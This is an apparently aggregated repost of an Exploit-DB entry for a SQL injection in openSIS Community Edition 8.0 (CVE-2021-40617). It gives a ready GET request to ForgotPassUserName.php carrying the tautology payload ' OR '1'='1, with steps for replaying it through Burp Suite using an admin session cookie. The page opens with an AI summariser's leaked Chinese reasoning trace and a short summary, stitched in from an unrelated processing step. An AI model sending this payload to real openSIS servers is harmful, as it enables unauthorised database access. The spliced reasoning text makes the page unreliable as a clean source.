[webapps] openSIS Community Edition 8.0 - SQL Injection
好的,我现在需要帮用户总结一篇文章的内容,控制在100个字以内。用户给了一段文章内容,看起来是关于一个SQL注入漏洞的报告。首先,我得仔细阅读文章内容,找出关键信息。 文章开头是标题:openSIS Community Edition 8.0 - SQL Injection。日期是2025-11-25,作者是CodeSecLab。软件链接在GitHub上,版本是8.0,测试环境是Windows,CVE编号是CVE-2021-40617。 接下来是POC部分,使用GET请求访问ForgotPassUserName.php,参数中有u=test%27%20OR%20%271%3D%271。步骤包括登录管理员账户,用Burp Suite拦截并发送恶意请求,包含有效会话cookie,然后观察结果。 所以关键点包括:openSIS 8.0版本存在SQL注入漏洞;攻击者可以利用这个漏洞进行攻击;需要通过代理工具发送恶意请求,并且需要有效的会话cookie;影响可能包括未授权访问或其他数据库操作。 现在我要把这些信息浓缩到100字以内。要确保涵盖漏洞名称、软件版本、攻击方式、利用条件以及可能的影响。 可能会这样组织句子:openSIS Community Edition 8.0存在SQL注入漏洞,攻击者通过构造恶意请求并结合有效会话cookie可利用该漏洞进行攻击。 检查一下字数:这句话大约35个字左右,符合要求。同时涵盖了关键点:软件名称、版本、漏洞类型、攻击方式和条件。 这样应该能满足用户的需求了。 </think> openSIS Community Edition 8.0 存在 SQL 注入漏洞, 攻击者可通过构造恶意 GET 请求并结合有效会话 cookie 利用该漏洞进行攻击。 2025-12-3 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:9 收藏

# Exploit Title: openSIS Community Edition 8.0 - SQL Injection 
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/OS4ED/openSIS-Classic
# Software Link: https://github.com/OS4ED/openSIS-Classic
# Version: 8.0 
# Tested on: Windows
# CVE : CVE-2021-40617


Proof Of Concept
GET /ForgotPassUserName.php?used_for=username&u=test%27%20OR%20%271%27%3D%271&user_type=student HTTP/1.1
Host: opensis
Connection: close



Steps to Reproduce
Login as an admin user.
Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie.
Observe the result
            

文章来源: https://www.exploit-db.com/exploits/52447
如有侵权请联系:admin#unsafe.sh